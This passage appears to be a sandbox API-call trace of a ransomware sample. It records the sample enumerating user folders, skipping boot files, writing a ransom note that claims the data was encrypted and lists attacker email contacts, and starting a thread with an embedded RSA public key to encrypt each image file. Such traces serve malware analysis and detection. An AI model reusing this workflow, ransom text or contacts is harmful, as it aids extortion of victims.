HALPmcxz" [0120.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0120.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0120.491] SetErrorMode (uMode=0x1) returned 0x1 [0120.491] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0120.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0120.491] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\" [0120.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*" [0120.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0120.491] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0120.491] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0120.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*" [0120.491] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="Desktop") returned 0x0 [0120.491] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="DESKTOP") returned 0x0 [0120.491] SetErrorMode (uMode=0x1) returned 0x1 [0120.491] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\_HELP_INSTRUCTION.TXT") returned 59 [0120.492] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0120.492] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0120.492] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x598) returned 0x0 [0120.492] RegQueryValueExW (in: hKey=0x598, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbc7f0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cbc7f0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0120.492] RegCloseKey (hKey=0x598) returned 0x0 [0120.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0120.492] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0120.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0120.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x598 [0120.493] WriteFile (in: hFile=0x598, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0120.493] CloseHandle (hObject=0x598) returned 1 [0120.494] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0120.494] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0120.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.494] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0120.494] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0120.494] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0120.494] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0120.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0120.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0120.494] SetErrorMode (uMode=0x1) returned 0x1 [0120.494] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0120.494] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0120.495] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0120.495] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0120.495] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0120.495] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="Pictures" [0120.495] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0120.495] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.495] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.495] lstrcmpW (lpString1="0feLIIudH.gif", lpString2="..") returned 1 [0120.495] lstrcmpW (lpString1="0feLIIudH.gif", lpString2=".") returned 1 [0120.495] StrStrW (lpFirst="0feLIIudH.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0120.495] StrStrW (lpFirst="0feLIIudH.gif", lpSrch="ntldr") returned 0x0 [0120.495] StrStrW (lpFirst="0feLIIudH.gif", lpSrch="NTLDR") returned 0x0 [0120.495] StrStrW (lpFirst="0feLIIudH.gif", lpSrch="NTDETECT.COM") returned 0x0 [0120.495] StrStrW (lpFirst="0feLIIudH.gif", lpSrch="ntdetect.com") returned 0x0 [0120.495] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0120.495] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0120.495] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0120.495] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.495] lstrcpyW (in: lpString1=0x17cf1c, lpString2="0feLIIudH.gif" | out: lpString1="0feLIIudH.gif") returned="0feLIIudH.gif" [0120.495] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0120.495] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x58c [0120.496] Sleep (dwMilliseconds=0x96) [0120.656] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.656] lstrcmpW (lpString1="0uVNLdVwplc802HWrb1.bmp", lpString2="..") returned 1 [0120.656] lstrcmpW (lpString1="0uVNLdVwplc802HWrb1.bmp", lpString2=".") returned 1 [0120.656] StrStrW (lpFirst="0uVNLdVwplc802HWrb1.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0120.656] StrStrW (lpFirst="0uVNLdVwplc802HWrb1.bmp", lpSrch="ntldr") returned 0x0 [0120.656] StrStrW (lpFirst="0uVNLdVwplc802HWrb1.bmp", lpSrch="NTLDR") returned 0x0 [0120.656] StrStrW (lpFirst="0uVNLdVwplc802HWrb1.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0120.656] StrStrW (lpFirst="0uVNLdVwplc802HWrb1.bmp", lpSrch="ntdetect.com") returned 0x0 [0120.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0120.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0120.656] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0120.656] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.656] lstrcpyW (in: lpString1=0x17cf1c, lpString2="0uVNLdVwplc802HWrb1.bmp" | out: lpString1="0uVNLdVwplc802HWrb1.bmp") returned="0uVNLdVwplc802HWrb1.bmp" [0120.656] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0120.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x590 [0120.656] Sleep (dwMilliseconds=0x96) [0120.874] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0120.874] lstrcmpW (lpString1="2b2gQ2C3WuJEBl.png", lpString2="..") returned 1 [0120.874] lstrcmpW (lpString1="2b2gQ2C3WuJEBl.png", lpString2=".") returned 1 [0120.874] StrStrW (lpFirst="2b2gQ2C3WuJEBl.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0120.874] StrStrW (lpFirst="2b2gQ2C3WuJEBl.png", lpSrch="ntldr") returned 0x0 [0120.874] StrStrW (lpFirst="2b2gQ2C3WuJEBl.png", lpSrch="NTLDR") returned 0x0 [0120.874] StrStrW (lpFirst="2b2gQ2C3WuJEBl.png", lpSrch="NTDETECT.COM") returned 0x0 [0120.874] StrStrW (lpFirst="2b2gQ2C3WuJEBl.png", lpSrch="ntdetect.com") returned 0x0 [0120.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0120.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0120.874] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0120.874] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.874] lstrcpyW (in: lpString1=0x17cf1c, lpString2="2b2gQ2C3WuJEBl.png" | out: lpString1="2b2gQ2C3WuJEBl.png") returned="2b2gQ2C3WuJEBl.png" [0120.874] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0120.874] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x59c [0120.875] Sleep (dwMilliseconds=0x96) [0121.088] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0121.088] lstrcmpW (lpString1="5X6u252V SzZ.gif", lpString2="..") returned 1 [0121.088] lstrcmpW (lpString1="5X6u252V SzZ.gif", lpString2=".") returned 1 [0121.088] StrStrW (lpFirst="5X6u252V SzZ.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0121.088] StrStrW (lpFirst="5X6u252V SzZ.gif", lpSrch="ntldr") returned 0x0 [0121.088] StrStrW (lpFirst="5X6u252V SzZ.gif", lpSrch="NTLDR") returned 0x0 [0121.088] StrStrW (lpFirst="5X6u252V SzZ.gif", lpSrch="NTDETECT.COM") returned 0x0 [0121.088] StrStrW (lpFirst="5X6u252V SzZ.gif", lpSrch="ntdetect.com") returned 0x0 [0121.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0121.088] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0121.088] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0121.088] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.088] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5X6u252V SzZ.gif" | out: lpString1="5X6u252V SzZ.gif") returned="5X6u252V SzZ.gif" [0121.088] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a0 [0121.089] Sleep (dwMilliseconds=0x96) [0121.295] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0121.295] lstrcmpW (lpString1="9s0pX7t.png", lpString2="..") returned 1 [0121.295] lstrcmpW (lpString1="9s0pX7t.png", lpString2=".") returned 1 [0121.295] StrStrW (lpFirst="9s0pX7t.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0121.295] StrStrW (lpFirst="9s0pX7t.png", lpSrch="ntldr") returned 0x0 [0121.295] StrStrW (lpFirst="9s0pX7t.png", lpSrch="NTLDR") returned 0x0 [0121.295] StrStrW (lpFirst="9s0pX7t.png", lpSrch="NTDETECT.COM") returned 0x0 [0121.295] StrStrW (lpFirst="9s0pX7t.png", lpSrch="ntdetect.com") returned 0x0 [0121.295] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0121.295] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0121.295] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0121.295] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.296] lstrcpyW (in: lpString1=0x17cf1c, lpString2="9s0pX7t.png" | out: lpString1="9s0pX7t.png") returned="9s0pX7t.png" [0121.296] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a8 [0121.296] Sleep (dwMilliseconds=0x96) [0121.452] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0121.452] lstrcmpW (lpString1="aqn8.gif", lpString2="..") returned 1 [0121.452] lstrcmpW (lpString1="aqn8.gif", lpString2=".") returned 1 [0121.452] StrStrW (lpFirst="aqn8.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0121.452] StrStrW (lpFirst="aqn8.gif", lpSrch="ntldr") returned 0x0 [0121.452] StrStrW (lpFirst="aqn8.gif", lpSrch="NTLDR") returned 0x0 [0121.452] StrStrW (lpFirst="aqn8.gif", lpSrch="NTDETECT.COM") returned 0x0 [0121.452] StrStrW (lpFirst="aqn8.gif", lpSrch="ntdetect.com") returned 0x0 